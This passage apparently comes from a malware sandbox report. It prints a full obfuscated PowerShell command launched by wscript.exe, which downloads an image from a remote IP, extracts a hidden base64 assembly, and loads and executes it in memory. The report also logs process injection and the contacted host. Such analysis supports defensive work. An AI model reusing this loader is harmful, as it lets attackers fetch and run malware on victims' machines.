gBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#bgBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Process injection Process 2084 resumed a thread in remote process 2180
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2180
1 0 0
option -noprofile value Does not load current user profile
option -noprofile value Does not load current user profile
dead_host 192.3.101.146:80
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe